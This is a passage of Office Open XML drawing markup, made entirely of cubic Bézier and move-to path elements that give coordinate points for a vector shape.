                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="248"/>
                    <a:pt x="73" y="248"/>
                    <a:pt x="74" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="248"/>
                    <a:pt x="76" y="248"/>
                    <a:pt x="77" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="248"/>
                    <a:pt x="77" y="248"/>
                    <a:pt x="77" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="249"/>
                    <a:pt x="78" y="249"/>
                    <a:pt x="78" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="249"/>
                    <a:pt x="79" y="249"/>
                    <a:pt x="79" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="248"/>
                    <a:pt x="79" y="247"/>
                    <a:pt x="79" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="243"/>
                    <a:pt x="86" y="245"/>
                    <a:pt x="88" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="241"/>
                    <a:pt x="89" y="241"/>
                    <a:pt x="91" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="239"/>
                    <a:pt x="91" y="238"/>
                    <a:pt x="92" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="237"/>
                    <a:pt x="94" y="237"/>
                    <a:pt x="100" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="238"/>
                    <a:pt x="100" y="235"/>
                    <a:pt x="101" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="233"/>
                    <a:pt x="103" y="233"/>
                    <a:pt x="104" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="233"/>
                    <a:pt x="105" y="230"/>
                    <a:pt x="106" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="223"/>
                    <a:pt x="106" y="216"/>
                    <a:pt x="107" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="210"/>
                    <a:pt x="106" y="210"/>
                    <a:pt x="106" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="209"/>
                    <a:pt x="106" y="208"/>
                    <a:pt x="106" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="207"/>
                    <a:pt x="105" y="207"/>
                    <a:pt x="105" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="205"/>
                    <a:pt x="105" y="204"/>
                    <a:pt x="105" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="202"/>
                    <a:pt x="105" y="202"/>
                    <a:pt x="104" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="202"/>
                    <a:pt x="104" y="202"/>
                    <a:pt x="103" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="203"/>
                    <a:pt x="102" y="203"/>
                    <a:pt x="101" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="208"/>
                    <a:pt x="100" y="208"/>
                    <a:pt x="99" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="207"/>
                    <a:pt x="98" y="207"/>
                    <a:pt x="98" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="207"/>
                    <a:pt x="97" y="207"/>
                    <a:pt x="96" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="207"/>
                    <a:pt x="96" y="207"/>
                    <a:pt x="96" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="208"/>
                    <a:pt x="94" y="208"/>
                    <a:pt x="93" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="209"/>
                    <a:pt x="91" y="209"/>
                    <a:pt x="91" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="205"/>
                    <a:pt x="91" y="205"/>
                    <a:pt x="91" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="204"/>
                    <a:pt x="92" y="204"/>
                    <a:pt x="93" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="204"/>
                    <a:pt x="93" y="204"/>
                    <a:pt x="93" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="205"/>
                    <a:pt x="95" y="206"/>
                    <a:pt x="97" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="204"/>
                    <a:pt x="97" y="204"/>
                    <a:pt x="97" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="203"/>
                    <a:pt x="96" y="203"/>
                    <a:pt x="96" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="203"/>
                    <a:pt x="95" y="203"/>
                    <a:pt x="95" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="203"/>
                    <a:pt x="94" y="203"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="203"/>
                    <a:pt x="90" y="203"/>
                    <a:pt x="89" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="202"/>
                    <a:pt x="88" y="202"/>
                    <a:pt x="88" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="201"/>
                    <a:pt x="88" y="200"/>
                    <a:pt x="88" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="197"/>
                    <a:pt x="88" y="197"/>
                    <a:pt x="88" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="195"/>
                    <a:pt x="84" y="195"/>
                    <a:pt x="84" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="192"/>
                    <a:pt x="83" y="189"/>
                    <a:pt x="84" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="183"/>
                    <a:pt x="87" y="184"/>
                    <a:pt x="88" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="187"/>
                    <a:pt x="89" y="190"/>
                    <a:pt x="91" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="197"/>
                    <a:pt x="96" y="197"/>
                    <a:pt x="101" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="198"/>
                    <a:pt x="101" y="198"/>
                    <a:pt x="101" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="198"/>
                    <a:pt x="102" y="198"/>
                    <a:pt x="102" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="198"/>
                    <a:pt x="104" y="198"/>
                    <a:pt x="104" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="197"/>
                    <a:pt x="105" y="197"/>
                    <a:pt x="105" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="198"/>
                    <a:pt x="106" y="198"/>
                    <a:pt x="108" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="199"/>
                    <a:pt x="108" y="199"/>
                    <a:pt x="108" y="199"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="325" y="149"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="122"/>
                    <a:pt x="313" y="97"/>
                    <a:pt x="304" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="77"/>
                    <a:pt x="191" y="76"/>
                    <a:pt x="142" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="103"/>
                    <a:pt x="116" y="138"/>
                    <a:pt x="110" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="179"/>
                    <a:pt x="254" y="179"/>
                    <a:pt x="321" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="176"/>
                    <a:pt x="321" y="176"/>
                    <a:pt x="316" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="170"/>
                    <a:pt x="315" y="169"/>
                    <a:pt x="315" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="169"/>
                    <a:pt x="316" y="168"/>
                    <a:pt x="317" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="166"/>
                    <a:pt x="317" y="166"/>
                    <a:pt x="317" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="165"/>
                    <a:pt x="317" y="165"/>
                    <a:pt x="316" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="164"/>
                    <a:pt x="318" y="164"/>
                    <a:pt x="318" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="164"/>
                    <a:pt x="319" y="163"/>
                    <a:pt x="319" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="162"/>
                    <a:pt x="320" y="162"/>
                    <a:pt x="320" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="162"/>
                    <a:pt x="322" y="162"/>
                    <a:pt x="322" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="162"/>
                    <a:pt x="323" y="162"/>
                    <a:pt x="323" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="161"/>
                    <a:pt x="324" y="161"/>
                    <a:pt x="324" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="160"/>
                    <a:pt x="324" y="160"/>
                    <a:pt x="324" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="159"/>
                    <a:pt x="321" y="159"/>
                    <a:pt x="320" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="159"/>
                    <a:pt x="319" y="158"/>
                    <a:pt x="319" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="157"/>
                    <a:pt x="317" y="157"/>
                    <a:pt x="316" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="158"/>
                    <a:pt x="316" y="159"/>
                    <a:pt x="316" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="160"/>
                    <a:pt x="315" y="160"/>
                    <a:pt x="314" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="159"/>
                    <a:pt x="314" y="158"/>
                    <a:pt x="314" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="156"/>
                    <a:pt x="311" y="156"/>
                    <a:pt x="310" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="155"/>
                    <a:pt x="309" y="152"/>
                    <a:pt x="310" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="152"/>
                    <a:pt x="312" y="152"/>
                    <a:pt x="312" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="149"/>
                    <a:pt x="317" y="148"/>
                    <a:pt x="319" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="146"/>
                    <a:pt x="320" y="146"/>
                    <a:pt x="320" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="147"/>
                    <a:pt x="321" y="147"/>
                    <a:pt x="321" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="149"/>
                    <a:pt x="318" y="153"/>
                    <a:pt x="318" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="153"/>
                    <a:pt x="319" y="153"/>
                    <a:pt x="319" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="152"/>
                    <a:pt x="321" y="152"/>
                    <a:pt x="322" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="151"/>
                    <a:pt x="324" y="150"/>
                    <a:pt x="325" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="149"/>
                    <a:pt x="325" y="149"/>
                    <a:pt x="325" y="149"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="82" y="70"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="84" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="70"/>
                    <a:pt x="84" y="70"/>
                    <a:pt x="84" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70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3" y="69"/>
                    <a:pt x="83" y="69"/>
                    <a:pt x="83" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="69"/>
                    <a:pt x="83" y="69"/>
                    <a:pt x="83" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83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70"/>
                    <a:pt x="82" y="70"/>
                    <a:pt x="82" y="70"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="132" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="134" y="29"/>
                    <a:pt x="135" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="29"/>
                    <a:pt x="135" y="29"/>
                    <a:pt x="135" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="29"/>
                    <a:pt x="135" y="29"/>
                    <a:pt x="135" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="29"/>
                    <a:pt x="134" y="29"/>
                    <a:pt x="134" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="29"/>
                    <a:pt x="134" y="29"/>
                    <a:pt x="134" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="132" y="30"/>
                    <a:pt x="132" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="31"/>
                    <a:pt x="132" y="31"/>
                    <a:pt x="132" y="31"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="61"/>
                    <a:pt x="157" y="49"/>
                    <a:pt x="165" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="38"/>
                    <a:pt x="165" y="38"/>
                    <a:pt x="164" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="39"/>
                    <a:pt x="163" y="39"/>
                    <a:pt x="163" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="39"/>
                    <a:pt x="163" y="39"/>
                    <a:pt x="163" y="39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1" y="39"/>
                    <a:pt x="161" y="40"/>
                    <a:pt x="161" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="40"/>
                    <a:pt x="160" y="40"/>
                    <a:pt x="160" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="39"/>
                    <a:pt x="160" y="39"/>
                    <a:pt x="160" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="38"/>
                    <a:pt x="162" y="37"/>
                    <a:pt x="162" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="37"/>
                    <a:pt x="161" y="37"/>
                    <a:pt x="158" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="39"/>
                    <a:pt x="157" y="39"/>
                    <a:pt x="157" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="38"/>
                    <a:pt x="155" y="39"/>
                    <a:pt x="155" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="39"/>
                    <a:pt x="154" y="39"/>
                    <a:pt x="154" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="39"/>
                    <a:pt x="154" y="39"/>
                    <a:pt x="154" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="40"/>
                    <a:pt x="147" y="43"/>
                    <a:pt x="143" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="44"/>
                    <a:pt x="142" y="44"/>
                    <a:pt x="142" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="43"/>
                    <a:pt x="142" y="43"/>
                    <a:pt x="142" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="42"/>
                    <a:pt x="143" y="42"/>
                    <a:pt x="144" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="41"/>
                    <a:pt x="145" y="41"/>
                    <a:pt x="146" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="40"/>
                    <a:pt x="147" y="40"/>
                    <a:pt x="147" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="39"/>
                    <a:pt x="147" y="39"/>
                    <a:pt x="147" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="38"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="148" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="38"/>
                    <a:pt x="147" y="38"/>
                    <a:pt x="147" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="38"/>
                    <a:pt x="147" y="38"/>
                    <a:pt x="147" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="37"/>
                    <a:pt x="147" y="37"/>
                    <a:pt x="147" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="37"/>
                    <a:pt x="146" y="37"/>
                    <a:pt x="146" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="37"/>
                    <a:pt x="146" y="37"/>
                    <a:pt x="145" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="37"/>
                    <a:pt x="145" y="37"/>
                    <a:pt x="145" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="38"/>
                    <a:pt x="144" y="38"/>
                    <a:pt x="144" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="38"/>
                    <a:pt x="144" y="38"/>
                    <a:pt x="144" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="39"/>
                    <a:pt x="143" y="40"/>
                    <a:pt x="142" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="42"/>
                    <a:pt x="140" y="42"/>
                    <a:pt x="140" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="43"/>
                    <a:pt x="140" y="43"/>
                    <a:pt x="140" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="44"/>
                    <a:pt x="140" y="44"/>
                    <a:pt x="140" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="44"/>
                    <a:pt x="139" y="44"/>
                    <a:pt x="139" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="45"/>
                    <a:pt x="138" y="46"/>
                    <a:pt x="137" y="46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7" y="45"/>
                    <a:pt x="137" y="45"/>
                    <a:pt x="137" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="45"/>
                    <a:pt x="137" y="45"/>
                    <a:pt x="137" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="45"/>
                    <a:pt x="131" y="48"/>
                    <a:pt x="128" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="48"/>
                    <a:pt x="128" y="48"/>
                    <a:pt x="128" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="49"/>
                    <a:pt x="127" y="49"/>
                    <a:pt x="127" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="50"/>
                    <a:pt x="127" y="51"/>
                    <a:pt x="126" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="51"/>
                    <a:pt x="126" y="51"/>
                    <a:pt x="126" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="51"/>
                    <a:pt x="125" y="51"/>
                    <a:pt x="125" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="51"/>
                    <a:pt x="124" y="51"/>
                    <a:pt x="124" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="51"/>
                    <a:pt x="123" y="51"/>
                    <a:pt x="123" y="51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23" y="50"/>
                    <a:pt x="123" y="50"/>
                    <a:pt x="124" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="50"/>
                    <a:pt x="121" y="50"/>
                    <a:pt x="121" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="51"/>
                    <a:pt x="121" y="51"/>
                    <a:pt x="121" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="52"/>
                    <a:pt x="120" y="52"/>
                    <a:pt x="120" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="52"/>
                    <a:pt x="120" y="52"/>
                    <a:pt x="120" y="52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1" y="53"/>
                    <a:pt x="121" y="53"/>
                    <a:pt x="120" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="54"/>
                    <a:pt x="119" y="54"/>
                    <a:pt x="119" y="54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18" y="54"/>
                    <a:pt x="118" y="53"/>
                    <a:pt x="118" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="52"/>
                    <a:pt x="117" y="52"/>
                    <a:pt x="117" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="52"/>
                    <a:pt x="117" y="52"/>
                    <a:pt x="120" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="49"/>
                    <a:pt x="119" y="49"/>
                    <a:pt x="119" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="48"/>
                    <a:pt x="120" y="48"/>
                    <a:pt x="120" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="46"/>
                    <a:pt x="123" y="46"/>
                    <a:pt x="123" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="45"/>
                    <a:pt x="123" y="45"/>
                    <a:pt x="123" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="44"/>
                    <a:pt x="123" y="44"/>
                    <a:pt x="124" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="43"/>
                    <a:pt x="124" y="43"/>
                    <a:pt x="124" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="42"/>
                    <a:pt x="124" y="42"/>
                    <a:pt x="125" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="43"/>
                    <a:pt x="124" y="43"/>
                    <a:pt x="124" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="43"/>
                    <a:pt x="125" y="43"/>
                    <a:pt x="125" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="43"/>
                    <a:pt x="125" y="43"/>
                    <a:pt x="125" y="43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6" y="44"/>
                    <a:pt x="126" y="44"/>
                    <a:pt x="127" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="45"/>
                    <a:pt x="128" y="45"/>
                    <a:pt x="128" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="46"/>
                    <a:pt x="128" y="46"/>
                    <a:pt x="128" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="46"/>
                    <a:pt x="129" y="46"/>
                    <a:pt x="129" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="46"/>
                    <a:pt x="129" y="46"/>
                    <a:pt x="129" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="42"/>
                    <a:pt x="138" y="42"/>
                    <a:pt x="138" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="39"/>
                    <a:pt x="137" y="39"/>
                    <a:pt x="137" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="38"/>
                    <a:pt x="137" y="38"/>
                    <a:pt x="137" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="36"/>
                    <a:pt x="137" y="36"/>
                    <a:pt x="136" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="36"/>
                    <a:pt x="136" y="36"/>
                    <a:pt x="136" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="35"/>
                    <a:pt x="136" y="35"/>
                    <a:pt x="136" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="34"/>
                    <a:pt x="135" y="34"/>
                    <a:pt x="135" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="35"/>
                    <a:pt x="135" y="35"/>
                    <a:pt x="134" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="35"/>
                    <a:pt x="134" y="35"/>
                    <a:pt x="134" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="35"/>
                    <a:pt x="134" y="35"/>
                    <a:pt x="135" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="34"/>
                    <a:pt x="135" y="34"/>
                    <a:pt x="135" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="33"/>
                    <a:pt x="136" y="33"/>
